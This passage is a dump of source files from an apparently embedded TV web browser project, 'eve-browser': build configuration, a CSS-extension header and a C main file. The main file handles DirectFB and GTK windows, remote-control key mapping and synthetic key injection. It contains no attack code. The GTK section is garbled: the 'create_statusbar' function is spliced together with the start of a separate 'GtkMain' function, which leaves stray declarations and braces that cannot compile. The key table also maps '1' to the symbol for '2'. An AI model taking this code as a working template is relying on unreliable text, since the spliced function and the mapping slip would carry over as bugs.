tools\nAC_PROG_CC\nAC_PROG_CXX\nAC_PROG_INSTALL\nAC_PROG_LIBTOOL\n\nAM_PATH_PYTHON\nAX_PYTHON_DEVEL\n\n\nPKG_CHECK_MODULES(PNG, libpng >= 0.0.1)\nAC_SUBST(PNG_CFLAGS)\nAC_SUBST(PNG_LIBS)\n\nPKG_CHECK_MODULES(FUSION, fusion >= 0.0.1)\nAC_SUBST(FUSION_CFLAGS)\nAC_SUBST(FUSION_LIBS)\n\nPKG_CHECK_MODULES(WEBKIT, webkit-1.0 >= 0.0.1)\nAC_SUBST(WEBKIT_CFLAGS)\nAC_SUBST(WEBKIT_LIBS)\n\nPKG_CHECK_MODULES(DFBINT, directfb-internal >= 0.0.1)\nAC_SUBST(DFBINT_CFLAGS)\nAC_SUBST(DFBINT_LIBS)\n\n# Checks for header files.\nAC_CHECK_HEADERS([stdlib.h string.h sys/time.h unistd.h])\n\nAC_OUTPUT(\nMakefile\n)\n" }, { "alpha_fraction": 0.7786259651184082, "alphanum_fraction": 0.7786259651184082, "avg_line_length": 15.375, "blob_id": "106a3af2a02293c98383b10cfe1248149ff5bde5", "content_id": "de708d4be7c72de538bfa723b2dd620d7bd6b10f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 131, "license_type": "no_license", "max_line_length": 51, "num_lines": 8, "path": "/css_extension.h", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#ifndef CSS_EXTENSIONS_H_\n#define CSS_EXTENSIONS_H_\n\n#ifdef GTK\nvoid registerCssExtension(WebKitWebView* web_view);\n#endif\n\n#endif\n" }, { "alpha_fraction": 0.5715886354446411, "alphanum_fraction": 0.5828268527984619, "avg_line_length": 27.129894256591797, "blob_id": "2e6b4586f47ed285004a5356d1984f230eca6abc", "content_id": "612772fb3d1e0b624ff70dc9e24937be0340ebc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 29453, "license_type": "no_license", "max_line_length": 119, "num_lines": 1047, "path": "/main.c", "repo_name": "popazerty/eve-browser", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <string.h>\n#include <pthread.h>\n#include <linux/input.h>\n#include <unistd.h>\n\n#ifdef GTK\n#include <gdk/gdkkeysyms.h>\n#include <gtk/gtk.h>\n#include <webkit/webkit.h>\n#endif\n\n#ifdef DFB\n#include <direct/thread.h>\n\n#include <glib.h>\n#include <glib-object.h>\n\n#include <lite/lite.h>\n#include <lite/window.h>\n\n#include <leck/textbutton.h>\n#include <leck/textline.h>\n\n#include <webkit/webkitdfb.h>\n#include <webkit/webview.h>\n\n#include <core/input.h>\n#endif\n\n#include <JavaScriptCore/JavaScript.h>\n\n#include \"js_extension.h\"\n#include \"css_extension.h\"\n\nstatic int (*g_Callback)(int type);\nstatic pthread_t g_BrowserMain;\nstatic char g_url[1024] = \"http://itv.ard.de/ardtext/\";\nstatic unsigned int g_framebuffer_width = 1280;\nstatic unsigned int g_framebuffer_height = 720;\nstatic int g_run = 1;\n\n#ifdef DFB\nstatic LiteWindow *g_window = NULL;\nstatic LiteWebView *g_webview = NULL;\n\nstatic pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;\n\nstatic IDirectFBWindow *g_dfb_window = NULL;\n#endif\n\n////////////////////////////////////////////\n\n//Should be changed to setPage and loadPage\nvoid loadPage(char * url)\n{\n printf(\"%s URL = %s\\n\", __func__, url);\n strncpy(g_url, url, 1024);\n/*#ifdef GTK\n webkit_web_view_load_uri (g_web_view, g_url);\n#else //DFB\n lite_webview_load(g_webview, g_url);\n#endif*/\n}\n\nvoid setDimension(int w, int h)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n g_framebuffer_width = w;\n g_framebuffer_height = h;\n}\n\nvoid setCallback(int (*fnc)(int type))\n{\n g_Callback = fnc;\n g_Callback(0);\n}\n\n#ifdef DFB\nstatic DFBResult\non_key_press( DFBWindowEvent* evt, void *ctx ) {\nprintf(\".\");\n if (evt->key_code == 0 && evt->key_id != 0xf600)\n { \n printf(\"on_key_press\\n\");\n /*printf(\"\\tevt->clazz: %02x\\n\", evt->clazz);\n printf(\"\\tevt->type: %02x\\n\", evt->type);\n printf(\"\\tevt->flags: %02x\\n\", evt->flags);\n printf(\"\\tevt->window_id: %02x\\n\", evt->window_id);\n printf(\"\\tevt->key_code: %02x\\n\", evt->key_code);\n printf(\"\\tevt->key_id: %02x\\n\", evt->key_id);\n printf(\"\\tevt->key_symbol: %02x\\n\", evt->key_symbol);\n printf(\"\\tevt->modifiers: %02x\\n\", evt->modifiers);\n printf(\"\\tevt->locks: %02x\\n\", evt->locks);*/\n \n return DFB_OK;\n }\n\n evt->key_id = (DFBInputDeviceKeyIdentifier)0x0;\n\n return DFB_FAILURE;\n}\n\n#define KEY_TYPE_PRESS 0\n#define KEY_TYPE_RELEASE 1\n\n/*\non_key_press\n evt->clazz: 02\n evt->type: 100\n evt->flags: 00\n evt->window_id: 01\n evt->key_code: 6c\n evt->key_symbol: f003\n evt->modifiers: 00\n evt->locks: 00\non_key_press\n evt->clazz: 02\n evt->type: 200\n evt->flags: 00\n evt->window_id: 01\n evt->key_code: 6c\n evt->key_symbol: f003\n evt->modifiers: 00\n evt->locks: 00\nkeyPress down press\non_key_press\n evt->clazz: 00\n evt->type: 100\n evt->flags: 00\n evt->window_id: 00\n evt->key_code: 00\n evt->key_symbol: 00\n evt->modifiers: 01\n evt->locks: 00\nkeyPress down release\non_key_press\n evt->clazz: 00\n evt->type: 200\n evt->flags: 00\n evt->window_id: 00\n evt->key_code: 00\n evt->key_symbol: 00\n evt->modifiers: 01\n evt->locks: 00\n*/\n\nvoid keyPress(char * key, int type)\n{\n printf(\"%s %s %s\\n\", __func__, key, type==0?\"press\":\"release\");\n\n#if 1 //WindowEvent\n DFBWindowEvent* event = ( DFBWindowEvent*)malloc(sizeof(DFBWindowEvent));\n memset(event, 0, sizeof(DFBWindowEvent));\n\n event->clazz = DFEC_WINDOW;\n\n if(type == KEY_TYPE_PRESS)\n event->type = DWET_KEYDOWN;\n else if(type == KEY_TYPE_RELEASE)\n event->type = DWET_KEYUP;\n else\n return;\n\n event->flags = DWEF_NONE;\n event->window_id = 1;\n#else //InputEvent\n DFBInputEvent* event = ( DFBInputEvent*)malloc(sizeof(DFBInputEvent));\n memset(event, 0, sizeof(DFBInputEvent));\n \n if(type == KEY_TYPE_PRESS)\n event->type = DIET_KEYPRESS;\n else if(type == KEY_TYPE_RELEASE)\n event->type = DIET_KEYRELEASE;\n else\n return;\n#endif\n\n //gettimeofday(&(event->timestamp), NULL);\n \n if (!strcmp(key, \"red\")) {\n event->key_id = DIKI_F5; //'t';\n event->key_symbol = DIKS_F5;\n } else if(!strcmp(key, \"green\")) {\n event->key_id = DIKI_F6; //'u';\n event->key_symbol = DIKS_F6;\n } else if(!strcmp(key, \"yellow\")) {\n event->key_id = DIKI_F7; //'v';\n event->key_symbol = DIKS_F7;\n } else if(!strcmp(key, \"blue\")) {\n event->key_id = DIKI_F8; //'w';\n event->key_symbol = DIKS_F8;\n\n } else if(!strcmp(key, \"up\")) {\n event->key_id = DIKI_UP; //f643\n event->key_symbol = DIKS_CURSOR_UP;\n } else if(!strcmp(key, \"down\")) {\n event->key_id = DIKI_DOWN;\n event->key_symbol = DIKS_CURSOR_DOWN; //(DFBInputDeviceKeySymbol)0xf003;\n } else if(!strcmp(key, \"left\")) {\n event->key_id = DIKI_LEFT;\n event->key_symbol = DIKS_CURSOR_LEFT;\n } else if(!strcmp(key, \"right\")) {\n event->key_id = DIKI_RIGHT;\n event->key_symbol = DIKS_CURSOR_RIGHT;\n \n } else if(!strcmp(key, \"ok\")) {\n event->key_id = DIKI_ENTER;\n event->key_symbol = DIKS_ENTER;\n \n } else if(!strcmp(key, \"1\")) {\n event->key_id = DIKI_1;\n event->key_symbol = DIKS_2;\n } else if(!strcmp(key, \"2\")) {\n event->key_id = DIKI_2;\n event->key_symbol = DIKS_2;\n } else if(!strcmp(key, \"3\")) {\n event->key_id = DIKI_3;\n event->key_symbol = DIKS_3;\n } else if(!strcmp(key, \"4\")) {\n event->key_id = DIKI_4;\n event->key_symbol = DIKS_4;\n } else if(!strcmp(key, \"5\")) {\n event->key_id = DIKI_5;\n event->key_symbol = DIKS_5;\n } else if(!strcmp(key, \"6\")) {\n event->key_id = DIKI_6;\n event->key_symbol = DIKS_6;\n } else if(!strcmp(key, \"7\")) {\n event->key_id = DIKI_7;\n event->key_symbol = DIKS_7;\n } else if(!strcmp(key, \"8\")) {\n event->key_id = DIKI_8;\n event->key_symbol = DIKS_8;\n } else if(!strcmp(key, \"9\")) {\n event->key_id = DIKI_9;\n event->key_symbol = DIKS_9;\n } else if(!strcmp(key, \"0\")) {\n event->key_id = DIKI_0;\n event->key_symbol = DIKS_0;\n\n //TODO: Confirm these\n } else if(!strcmp(key, \"play\")) {\n event->key_id = DIKI_P;\n event->key_symbol = DIKS_CAPITAL_P;\n } else if(!strcmp(key, \"pause\")) {\n event->key_id = DIKI_P; // PAUSE IS Q but it seems that P is Toggle PlayPause\n event->key_symbol = DIKS_CAPITAL_P;\n } else if(!strcmp(key, \"stop\")) {\n event->key_id = DIKI_S;\n event->key_symbol = DIKS_CAPITAL_S;\n } else if(!strcmp(key, \"rewind\")) {\n event->key_id = DIKI_R;\n event->key_symbol = DIKS_CAPITAL_R;\n } else if(!strcmp(key, \"fastforward\")) {\n event->key_id = DIKI_F;\n event->key_symbol = DIKS_CAPITAL_F;\n } else {\n event->key_id = (DFBInputDeviceKeyIdentifier)0;\n }\n \n if(event->key_id != 0) {\n printf(\"Injecting: event.key_id=%02x\\n\", event->key_id);\n //pthread_mutex_lock(&mutex);\n#if 0 // LITE_INJECTION_WORKS\n lite_webview_handleKeyboardEvent( g_webview, event );\n#else\n if(g_dfb_window != NULL)\n g_dfb_window->SendEvent(g_dfb_window, event);\n#endif\n //pthread_mutex_unlock(&mutex);\n return;\n }\n\n free(event);\n\n return;\n}\n\nvoid on_webview_doc_loaded( LiteWebView *webview, void *data )\n{\n lite_webview_set_transparent(webview, true);\n}\n\nstatic int timer_id;\n\nstatic DFBResult timeout_cb(void* data)\n{\n g_main_context_iteration(NULL, FALSE);\n lite_enqueue_window_timeout(200, timeout_cb, NULL, &timer_id);\n return DFB_OK;\n}\n\nvoid *BrowserMain(void * argument)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n int argc = 0;\n char**argv = NULL;\n\n\n pthread_mutex_init (&mutex, NULL);\n \n g_type_init();\n g_thread_init(NULL);\n\n lite_open( &argc, &argv );\n\n WebKitDFB_Initialize( lite_get_dfb_interface() );\n\n IDirectFBDisplayLayer *layer;\n DFBDisplayLayerConfig config;\n lite_get_layer_interface( &layer );\n layer->GetConfiguration( layer, &config );\n\n DFBRectangle windowRect = { 0, 0, config.width, config.height };\n DFBRectangle webviewRect = { 0, 0, config.width, config.height };\n\n lite_new_window( NULL, &windowRect, DWCAPS_NONE, liteNoWindowTheme, \"WebKitDFB\", &g_window );\n \n lite_new_webview( LITE_BOX(g_window), &webviewRect, liteDefaultWebViewTheme, &g_webview);\n\n lite_on_webview_doc_loaded ( g_webview, on_webview_doc_loaded, NULL );\n\n lite_on_raw_window_keyboard(g_window, on_key_press, g_webview );\n\n lite_focus_box( LITE_BOX(g_webview) );\n\n lite_set_window_opacity(g_window, 0xff);\n\n g_window->bg.enabled = DFB_FALSE;\n //lite_set_window_background_color(g_window, 0xff, 0, 0, 0xff);\n\n registerJsFunctions(g_webview, g_Callback);\n\n lite_webview_load(g_webview, g_url);\n lite_webview_set_transparent(g_webview, true);\n\n // FAKE KEY INTERFACE\n //IDirectFB *dfb;\n //dfb = lite_get_dfb_interface();\n //IDirectFBDisplayLayer *layer = NULL;\n //dfb->GetDisplayLayer(dfb, DLID_PRIMARY, &layer);\n layer->GetWindow(layer, 1, &g_dfb_window);\n\n lite_enqueue_window_timeout(200, timeout_cb, NULL, &timer_id);\n g_run = 1;\n while (g_run) {\n pthread_mutex_lock(&mutex);\n\n g_main_context_iteration(NULL, FALSE);\n lite_window_event_loop(g_window, 1);\n pthread_mutex_unlock(&mutex);\n }\n\n lite_close();\n\n return NULL;\n}\n\n#include <unistd.h>\nint\nmain (int argc, char* argv[])\n{\n pthread_create(&g_BrowserMain, NULL, BrowserMain, NULL);\n //pthread_join(g_BrowserMain, NULL);\n while(1) {\n sleep(2);\n keyPress(\"blue\", 0);\n keyPress(\"blue\", 1);\n }\n\n return 0;\n}\n\nvoid loadEveBrowser()\n{\n}\n\nvoid unloadEveBrowser()\n{\n g_run = 0;\n}\n\nvoid show()\n{\n pthread_create(&g_BrowserMain, NULL, BrowserMain, NULL);\n}\n\nvoid hide()\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n //gtk_widget_hide_all (g_window);\n}\n\n#endif\n\n#ifdef GTK\nstatic GtkWidget* uri_entry;\n\n\nstatic GtkToolItem* itemUrl;\nstatic GtkScrolledWindow* scrolled_window;\nstatic guint status_context_id;\n\n\n\n\n\n\nstatic GtkWidget* g_window;\nstatic GtkWidget* g_vbox;\nstatic WebKitWebView* g_web_view;\nstatic GtkWidget* g_toolbar;\nstatic GtkStatusbar* g_main_statusbar;\n\n\nfloat g_default_scale = 1.0f;\n///////////////////////////\n///////////////////////////\n\nstatic void window_object_cleared_cb( WebKitWebView *frame,\n gpointer context,\n gpointer arg3,\n gpointer user_data)\n{\n printf(\"window_object_cleared_cb\\n\");\n\n registerJsFunctions(g_web_view, g_Callback);\n}\n\n///////////////////////7\n\nstatic void\nactivate_uri_entry_cb (GtkWidget* entry, gpointer data)\n{\n const gchar* uri = gtk_entry_get_text (GTK_ENTRY (entry));\n g_assert (uri);\n webkit_web_view_load_uri (g_web_view, uri);\n}\n\nstatic void\nlink_hover_cb (WebKitWebView* page, const gchar* title, const gchar* link, gpointer data)\n{\n /* underflow is allowed */\n gtk_statusbar_pop (g_main_statusbar, status_context_id);\n if (link)\n gtk_statusbar_push (g_main_statusbar, status_context_id, link);\n}\n\nstatic void\nnotify_load_status_cb (WebKitWebView* web_view, GParamSpec* pspec, gpointer data)\n{\n if (webkit_web_view_get_load_status (web_view) == WEBKIT_LOAD_COMMITTED) {\n WebKitWebFrame* frame = webkit_web_view_get_main_frame (web_view);\n const gchar* uri = webkit_web_frame_get_uri (frame);\n if (uri)\n gtk_entry_set_text (GTK_ENTRY (uri_entry), uri);\n }\n}\n\nstatic void\ndestroy_cb (GtkWidget* widget, gpointer data)\n{\n gtk_main_quit ();\n}\n\n\nstatic gboolean\nfocus_out_cb (GtkWidget* widget, GdkEvent * event, gpointer data)\n{\n printf(\"%s > \\n\", __func__);\n gtk_widget_grab_focus(widget);\n return false;\n}\n\n\nstatic void\ndocument_load_finished_cb (GtkWidget* widget, WebKitWebFrame * arg1, gpointer data)\n{\n registerCssExtension(g_web_view);\n\n // Only use if debugging is needed\n //registerSpecialJsFunctions(g_web_view);\n}\n\n\nvoid goBack()\n{\n webkit_web_view_go_back(g_web_view);\n}\n\nvoid gtk_widget_set_can_focus(GtkWidget* wid, gboolean can)\n{\n if(can)\n GTK_WIDGET_SET_FLAGS(wid, GTK_CAN_FOCUS);\n else\n GTK_WIDGET_UNSET_FLAGS(wid, GTK_CAN_FOCUS);\n}\n\nstatic GtkScrolledWindow*\ncreate_browser ()\n{\n scrolled_window = (GtkScrolledWindow*)gtk_scrolled_window_new (NULL, NULL);\n gtk_scrolled_window_set_policy (GTK_SCROLLED_WINDOW (scrolled_window), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC);\n\n g_web_view = WEBKIT_WEB_VIEW (webkit_web_view_new ());\n webkit_web_view_set_transparent(g_web_view, true);\n gtk_container_add (GTK_CONTAINER (scrolled_window), GTK_WIDGET (g_web_view));\n webkit_web_view_set_full_content_zoom(g_web_view, true);\n\n g_signal_connect (g_web_view, \"notify::load-status\", G_CALLBACK (notify_load_status_cb), g_web_view);\n g_signal_connect (g_web_view, \"hovering-over-link\", G_CALLBACK (link_hover_cb), g_web_view);\n\n g_signal_connect (g_web_view, \"focus-out-event\", G_CALLBACK (focus_out_cb), g_web_view);\n\n g_signal_connect (g_web_view, \"document-load-finished\", G_CALLBACK (document_load_finished_cb), g_web_view);\n\n g_signal_connect (g_web_view, \"window_object_cleared\", G_CALLBACK (window_object_cleared_cb), g_web_view);\n\n return scrolled_window;\n}\n\nstatic GtkWidget*\ncreate_statusbar ()void *GtkMain(void * argument)\n{\n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n int argc = 0;\n char**argv = NULL;\n\n unsigned char haveUrl = 0;\n int argCount = 0;\n{\n g_main_statusbar = GTK_STATUSBAR (gtk_statusbar_new ());\n gtk_widget_set_can_focus(GTK_WIDGET (g_main_statusbar), false);\n status_context_id = gtk_statusbar_get_context_id (g_main_statusbar, \"Link Hover\");\n \n return (GtkWidget*)g_main_statusbar;\n}\n\nstatic GtkWidget*\ncreate_toolbar ()\n{\n g_toolbar = gtk_toolbar_new ();\n gtk_widget_set_can_focus(GTK_WIDGET (g_toolbar), false);\n\n#if GTK_CHECK_VERSION(2,15,0)\n gtk_orientable_set_orientation (GTK_ORIENTABLE (g_toolbar), GTK_ORIENTATION_HORIZONTAL);\n#else\n gtk_toolbar_set_orientation (GTK_TOOLBAR (g_toolbar), GTK_ORIENTATION_HORIZONTAL);\n#endif\n gtk_toolbar_set_style (GTK_TOOLBAR (g_toolbar), GTK_TOOLBAR_BOTH_HORIZ);\n\n\n /* The URL entry */\n itemUrl = gtk_tool_item_new ();\n gtk_widget_set_can_focus(GTK_WIDGET (itemUrl), false);\n gtk_tool_item_set_expand (itemUrl, TRUE);\n uri_entry = gtk_entry_new ();\n gtk_container_add (GTK_CONTAINER (itemUrl), uri_entry);\n g_signal_connect (G_OBJECT (uri_entry), \"activate\", G_CALLBACK (activate_uri_entry_cb), NULL);\n gtk_toolbar_insert (GTK_TOOLBAR (g_toolbar), itemUrl, -1);\n\n return g_toolbar;\n}\n\n/**\n * This toogles the background of the window\n **/\nstatic void\ntoogleBackground (void)\n{\n printf(\"%s > \\n\", __func__);\n static gboolean isTransparent = false;\n isTransparent = !isTransparent;\n webkit_web_view_set_transparent(g_web_view, isTransparent);\n}\n\nstatic gboolean isShown = true;\n\nstatic void\ntoogleMode (void)\n{\n printf(\"%s > \\n\", __func__);\n if(isShown)\n {\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width, g_framebuffer_height);\n gtk_widget_hide(GTK_WIDGET (g_main_statusbar));\n gtk_widget_hide(GTK_WIDGET (g_toolbar));\n }\n else\n {\n gtk_widget_set_size_request(g_vbox, g_framebuffer_width-200, g_framebuffer_height);\n gtk_widget_show(GTK_WIDGET (g_main_statusbar));\n gtk_widget_show(GTK_WIDGET (g_toolbar));\n\n gtk_widget_grab_focus(GTK_WIDGET (itemUrl));\n }\n isShown = !isShown;\n}\n\nstatic gboolean gIsNumLock = false;\nstatic void toogleNumLock()\n{\n gIsNumLock = !gIsNumLock;\n}\n\nstatic gboolean gIsZoomLock = false;\nstatic void toggleZoomLock()\n{\n gIsZoomLock = !gIsZoomLock;\n}\n\nstatic void handleZoomLock(int value)\n{\n if(value > 0)\n webkit_web_view_zoom_in(g_web_view);\n else if(value < 0)\n webkit_web_view_zoom_out(g_web_view);\n else\n webkit_web_view_set_zoom_level(g_web_view, g_default_scale );\n}\n\nstatic gboolean\non_key_press (GtkWidget* widget, GdkEventKey *event, gpointer data)\n{\n\nif(event->send_event == 0)\n return true;\n\nprintf(\"POST----------\\n\");\nprintf(\"type = %d\\n\", event->type);\nprintf(\"window = %8x\\n\", event->window);\nprintf(\"send_event = %d\\n\", event->send_event );\nprintf(\"time = %8x\\n\", event->time);\nprintf(\"state = %d\\n\", event->state);\nprintf(\"keyval = %d\\n\", event->keyval);\n//printf(\"length = %d\\n\", event->length);\n//printf(\"string = %s\\n\", event->string);\nprintf(\"hardware_keycode = %d\\n\", event->hardware_keycode);\nprintf(\"group = %d\\n\", event->group);\nprintf(\"is_modifier = %d\\n\", event->is_modifier);\n\n if (event->type == GDK_KEY_PRESS)\n {\n\n if(gIsZoomLock)\n {\n switch(event->keyval)\n {\n case GDK_Up: handleZoomLock(+1); break;\n case GDK_Return: handleZoomLock(0); break;\n case GDK_Down: handleZoomLock(-1); break;\n default: break;\n }\n }\n\n if (event->keyval == GDK_F1)\n {\n toogleMode();\n }\n else if (isShown && event->keyval == GDK_F2)\n {\n //toogleBackground();\n toggleZoomLock();\n }\n else if (isShown && event->keyval == GDK_Num_Lock)\n {\n toogleNumLock();\n }\n else if (isShown && event->keyval == GDK_F4)\n {\n gboolean rtv;\n event->keyval = GDK_Tab;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_F3)\n {\n gboolean rtv;\n event->keyval = GDK_Tab;\n event->state |= GDK_SHIFT_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval >= 0xFFB0 && event->keyval <= 0xFFB9)\n {\n gIsNumLock = true;\n //event->state |= GDK_MOD1_MASK;\n switch(event->keyval) {\n case GDK_KP_1: event->keyval = '.'; break;\n case GDK_KP_2: event->keyval = 'a'; break;\n case GDK_KP_3: event->keyval = 'd'; break;\n case GDK_KP_4: event->keyval = 'g'; break;\n case GDK_KP_5: event->keyval = 'j'; break;\n case GDK_KP_6: event->keyval = 'm'; break;\n case GDK_KP_7: event->keyval = 'p'; break;\n case GDK_KP_8: event->keyval = 't'; break;\n case GDK_KP_9: event->keyval = 'w'; break;\n case GDK_KP_0: event->keyval = '+'; break;\n default: break;\n }\n }\n else if (isShown && event->keyval == GDK_KP_Down )\n {\n gboolean rtv;\n event->keyval = '2';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Up )\n {\n gboolean rtv;\n event->keyval = '8';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Left )\n {\n gboolean rtv;\n event->keyval = '4';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Right )\n {\n gboolean rtv;\n event->keyval = '6';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Home )\n {\n gboolean rtv;\n event->keyval = '7';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Page_Up )\n {\n gboolean rtv;\n event->keyval = '9';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_End )\n {\n gboolean rtv;\n event->keyval = '1';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Page_Down )\n {\n gboolean rtv;\n event->keyval = '3';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && (event->keyval == GDK_KP_Insert || event->keyval == 0xFFFFFF))\n {\n gboolean rtv;\n event->keyval = '0';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (isShown && event->keyval == GDK_KP_Begin )\n {\n gboolean rtv;\n event->keyval = '5';\n event->state |= GDK_MOD1_MASK;\n gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n return true;\n }\n else if (event->keyval == GDK_BackSpace)\n goBack();\n }\n return false;\n}\n\n\nstatic gboolean expose_event(GtkWidget * widget, GdkEventExpose * event)\n{\n printf(\"%s\\n\", __func__);\n cairo_t *cr;\n\n cr = gdk_cairo_create(GDK_DRAWABLE(widget->window));\n gdk_cairo_region(cr, event->region);\n cairo_clip(cr);\n\n cairo_set_operator(cr, CAIRO_OPERATOR_SOURCE);\n cairo_set_source_rgba(cr, 0.5, 0.5, 0.5, 1.0);\n cairo_paint(cr);\n cairo_destroy(cr);\n return false;\n}\n\nstatic GtkWidget*\ncreate_window ()\n{\n g_window = gtk_window_new (GTK_WINDOW_TOPLEVEL);\n gtk_window_set_default_size (GTK_WINDOW (g_window), g_framebuffer_width, g_framebuffer_height);\n gtk_widget_set_name (g_window, \"eve-browser\");\n gtk_window_set_decorated(GTK_WINDOW(g_window), false);\n\n GdkScreen *screen = gtk_widget_get_screen(g_window);\n gtk_widget_set_colormap(g_window, gdk_screen_get_rgba_colormap(screen));\n gtk_widget_set_app_paintable(g_window, true);\n gtk_widget_realize(g_window);\n gdk_window_set_back_pixmap(g_window->window, NULL, false);\n\n g_signal_connect(g_window, \"expose-event\", G_CALLBACK(expose_event), g_window);\n\n g_signal_connect (g_window, \"destroy\", G_CALLBACK (destroy_cb), NULL);\n g_signal_connect (g_window, \"key-press-event\", G_CALLBACK (on_key_press), NULL);\n g_signal_connect (g_window, \"key-release-event\", G_CALLBACK (on_key_press), NULL);\n\n //g_signal_connect (g_window, \"screen-changed\", G_CALLBACK (screen_changed), NULL);\n return g_window;\n}\n\n////////////////////////////////////////////////////////////////////////////////////////////////////\n\n#define KEY_TYPE_PRESS 0\n#define KEY_TYPE_RELEASE 1\n\nvoid keyPress(char * key, int type)\n{\n printf(\"%s %s\\n\", __func__, key);\n gboolean rtv;\n/*\n GdkEventType type;\n GdkWindow *window;\n gint8 send_event;\n guint32 time;\n guint state;\n guint keyval;\n gint length;\n gchar *string;\n guint16 hardware_keycode;\n guint8 group;\n guint is_modifier : 1;\n*/\n\n //GdkEventKey * event = (GdkEventKey*)malloc(sizeof(GdkEventKey));\n GdkEvent* event = gdk_event_new(GDK_KEY_PRESS); \n\n\n if(type == KEY_TYPE_PRESS)\n ((GdkEventKey*)event)->type = GDK_KEY_PRESS; \n else if(type == KEY_TYPE_RELEASE) \n ((GdkEventKey*)event)->type = GDK_KEY_RELEASE;\n else\n return;\n \n ((GdkEventKey*)event)->window = g_window->window; \n\n ((GdkEventKey*)event)->send_event = 1;\n ((GdkEventKey*)event)->time = GDK_CURRENT_TIME;\n ((GdkEventKey*)event)->state = 0;\n \n ((GdkEventKey*)event)->keyval = 0;\n //((GdkEventKey*)event)->length = 1;\n \n if (!strcmp(key, \"red\"))\n ((GdkEventKey*)event)->keyval = GDK_F5; //'t';\n else if(!strcmp(key, \"green\"))\n ((GdkEventKey*)event)->keyval = GDK_F6; //'u';\n else if(!strcmp(key, \"yellow\"))\n ((GdkEventKey*)event)->keyval = GDK_F7; //'v';\n else if(!strcmp(key, \"blue\"))\n ((GdkEventKey*)event)->keyval = GDK_F8; //'w';\n\n else if(!strcmp(key, \"up\"))\n ((GdkEventKey*)event)->keyval = GDK_Up;\n else if(!strcmp(key, \"down\"))\n ((GdkEventKey*)event)->keyval = GDK_Down;\n else if(!strcmp(key, \"left\"))\n ((GdkEventKey*)event)->keyval = GDK_Left;\n else if(!strcmp(key, \"right\"))\n ((GdkEventKey*)event)->keyval = GDK_Right;\n \n else if(!strcmp(key, \"ok\"))\n ((GdkEventKey*)event)->keyval = GDK_Return;\n else if(!strcmp(key, \"play\"))\n ((GdkEventKey*)event)->keyval = 'P';\n else if(!strcmp(key, \"pause\"))\n ((GdkEventKey*)event)->keyval = 'P'; // PAUSE IS Q but it seems that P is Toggle PlayPause\n else if(!strcmp(key, \"stop\"))\n ((GdkEventKey*)event)->keyval = 'S';\n else if(!strcmp(key, \"rewind\"))\n ((GdkEventKey*)event)->keyval = 'R';\n else if(!strcmp(key, \"fastforward\"))\n ((GdkEventKey*)event)->keyval = 'F';\n\n\n else {\n GdkKeymapKey* keys; \n gint n_keys; \n gdk_keymap_get_entries_for_keyval(gdk_keymap_get_default(), ((GdkEventKey*)event)->keyval, &keys, &n_keys); \n\n ((GdkEventKey*)event)->hardware_keycode = keys[0].keycode; \n }\n\n ((GdkEventKey*)event)->group = 0;\n ((GdkEventKey*)event)->is_modifier = 0;\n \n \n if(((GdkEventKey*)event)->keyval != 0) {\n //if(type == KEY_TYPE_PRESS) {\n //gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-press-event\", event, &rtv);\n gdk_event_put(event); \n //}\n //else if(type == KEY_TYPE_RELEASE) \n // gtk_signal_emit_by_name(GTK_OBJECT (g_window), \"key-release-event\", event, &rtv);\n return;\n }\n\n //event->state |= GDK_MOD1_MASK;\n return;\n}\n\n\n\nvoid loadEveBrowser()\n{\n int argc = 0;\n printf(\"%s:%d\\n\", __func__, __LINE__);\n gtk_init_check(&argc, NULL);\n if (!g_thread_supported ())\n g_thread_init (NULL);\n \n printf(\"%s:%d\\n\", __func__, __LINE__);\n\n GtkWidget* fixed = gtk_fixed_new();\n g_vbox = gtk_vbox_new (FALSE, 0);\n gtk_box_pack_start (GTK_BOX (g_vbox), create_toolbar (), FALSE, FALSE, 0);\n gtk_box_pack_start (GTK_BOX 